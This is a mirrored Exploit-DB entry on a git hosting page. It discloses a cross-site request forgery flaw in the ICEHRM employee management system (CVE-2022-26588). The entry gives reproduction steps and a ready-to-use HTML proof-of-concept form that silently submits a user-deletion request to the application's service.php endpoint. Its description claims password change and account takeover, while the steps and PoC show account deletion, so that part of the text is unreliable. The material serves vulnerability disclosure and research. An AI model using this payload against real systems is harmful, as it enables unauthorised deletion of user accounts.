bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50855.txt
Offensive Security 50cc2edafe DB: 2022-04-08 
9 changes to exploits/shellcodes

Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path
binutils 2.37 - Objdump Segmentation Fault
Kramer VIAware - Remote Code Execution (RCE) (Root)
Opmon 9.11 - Cross-site Scripting
Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated)
KLiK Social Media Website 1.0 - 'Multiple' SQLi
minewebcms 1.15.2 - Cross-site Scripting (XSS)
qdPM 9.2 - Cross-site Request Forgery (CSRF)
ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion
2022-04-08 05:01:37 +00:00

52 lines
No EOL
1.7 KiB
Text
Raw Blame History

# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion
# Date: 29/03/2022
# Exploit Author: Devansh Bordia
# Vendor Homepage: https://icehrm.com/
# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS
# Version: 31.0.0.OS
#Tested on: Windows 10
# CVE: CVE-2022-26588
1. About - ICEHRM
IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.
2. Description:
The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover.
3. Steps To Reproduce:
1.) Now login into the application and go to users.
2.) After this add an user with the name Devansh.
3.) Now try to delete the user and intercept the request in burp suite. We can see no CSRF Token in request.
4.) Go to any CSRF POC Generator: https://security.love/CSRF-PoC-Genorator/
5.) Now generate a csrf poc for post based requests with necessary parameters.
6.) Finally open that html poc and execute in the same browser session.
7.) Now if we refresh the page, the devansh is deleted to csrf vulnerability.
4. Exploit POC (Exploit.html)
<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="
http://localhost:8070/app/service.php">
<table>
<tr>
<td>t</td>
<td>
<input type="text" value="User" name="t">
</td>
</tr>
<tr>
<td>a</td>
<td>
<input type="text" value="delete" name="a">
</td>
</tr>
<tr>
<td>id</td>
<td>
<input type="text" value="6" name="id">
</td>
</tr>
</table>
<input type="submit" value="http://localhost:8070/app/service.php"> </form>
</html>
Reference in a new issue View git blame Copy permalink